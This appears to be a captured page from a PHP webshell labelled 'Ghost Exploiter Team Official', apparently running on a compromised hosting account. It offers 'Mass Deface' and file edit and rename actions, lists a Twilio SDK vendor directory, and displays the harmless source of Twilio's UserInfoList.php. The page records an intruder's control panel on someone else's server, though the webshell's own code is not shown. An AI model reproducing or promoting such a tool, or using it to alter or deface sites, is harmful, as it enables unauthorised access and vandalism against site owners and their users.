webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Oauth
/
V1
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DeviceCodeInstance.php
2.135KB
edt
ren
DeviceCodeList.php
1.747KB
edt
ren
DeviceCodeOptions.php
1.391KB
edt
ren
DeviceCodePage.php
1.133KB
edt
ren
OauthContext.php
1.294KB
edt
ren
OauthInstance.php
2.468KB
edt
ren
OauthList.php
0.856KB
edt
ren
OauthPage.php
1.104KB
edt
ren
OpenidDiscoveryContext.php
1.398KB
edt
ren
OpenidDiscoveryInstance
...
3.991KB
edt
ren
OpenidDiscoveryList.php
0.915KB
edt
ren
OpenidDiscoveryPage.php
1.162KB
edt
ren
TokenInstance.php
2.123KB
edt
ren
TokenList.php
1.929KB
edt
ren
TokenOptions.php
4.026KB
edt
ren
TokenPage.php
1.104KB
edt
ren
UserInfoContext.php
1.32KB
edt
ren
UserInfoInstance.php
2.898KB
edt
ren
UserInfoList.php
0.874KB
edt
ren
UserInfoPage.php
1.121KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\Rest\Oauth\V1; use Twilio\ListResource; use Twilio\Version; class UserInfoList extends ListResource { /** * Construct the UserInfoList * * @param Version $version Version that contains the resource */ public function __construct(Version $version) { parent::__construct($version); // Path Solution $this->solution = []; } /** * Constructs a UserInfoContext */ public function getContext(): UserInfoContext { return new UserInfoContext($this->version); } /** * Provide a friendly representation * * @return string Machine friendly representation */ public function __toString(): string { return '[Twilio.Oauth.V1.UserInfoList]'; } }